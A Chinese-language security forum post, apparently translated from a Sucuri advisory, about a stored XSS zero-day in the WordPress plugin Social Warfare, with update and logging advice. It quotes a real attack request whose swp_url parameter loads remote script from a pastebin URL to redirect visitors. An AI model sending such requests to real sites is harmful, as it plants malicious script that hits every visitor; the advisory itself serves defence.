WordPress流行插件Social Warfare曝出XSS漏洞,影响数万网站

Track-SSG   ·   发表于 2019-03-25 11:03:28   ·   漏洞文章

22.png

近期,网上曝出WordPress的流行插件Social Warfare出现一个零日漏洞,影响超过70,000个网站。

此次曝出的漏洞为存储型的XSS(跨站脚本攻击)漏洞,存在漏洞的插件已从插件库中删除。任何访问使用了漏洞插件的网站的用户都会受到攻击。

目前该插件作者已发布安全补丁,建议用户尽快更新到版本3.5.3。

细节

存在漏洞的代码存在于插件的某些调试功能中。这些功能并不能直接使用,而是需要依赖于$_GET参数来执行。因此,你可以轻松判断你的网站是否受到此漏洞影响。

一旦攻击成功,XSS漏洞的payload就会存储到网站数据库中,造成持续影响。

目前网络上已经出现了PoC,预计未来几天相关攻击的数量会持续增加。

攻击特征

你可以在你服务器的访问日志中查找任何指向/wp-admin/下PHP文件的请求以及相关参数:

  • swp_debug
  • swp_url
  • 攻击流量

    在公网中可以观察到如下攻击流量,涉及100多个IP。

    202.254.236.49 - - [21/Mar/2019:16:52:14 -0400] "GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url=https://pastebin.com/raw/0yJzqbYf HTTP/1.1" 403 2669 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"

    该攻击会加载网址[https://pastebin.com/raw/0yJzqbYf](https://pastebin.com/raw/0yJzqbYf)的恶意前端脚本,其中payload如下:

    33.png

    该脚本将用户重定向到另一个恶意站点。

    结论

    跨站点脚本攻击(XSS)是一种普遍存在的漏洞,一旦受害者点击恶意链接,攻击者能往受害者的浏览器加载恶意代码,产生难以估计的恶劣影响。

    Social Warfare插件的这个存储型XSS的payload会存储在站点的数据库中,危害巨大,一旦攻击成功,任何浏览被攻陷网站的用户都会受到影响。

    为了防止受到此漏洞攻击,我们强烈建议所有安装了Social Warfare插件的用户尽快将其更新到3.5.3版本。如果您法立即更新,可以利用防火墙等安全设备拦截攻击。

    来源:https://blog.sucuri.net/2019/03/zero-day-stored-xss-in-social-warfare.html?utm_source=Twitter&utm_medium=Social&utm_campaign=Blog&utm_term=EN&utm_content=zero-day-stored-xss-in-social-warfare
               


    打赏我,让我更有动力~

    0 条回复   |  直到 2019-3-25 | 1050 次浏览
    登录后才可发表内容
    返回顶部 投诉反馈

    © 2016 - 2024 掌控者 All Rights Reserved.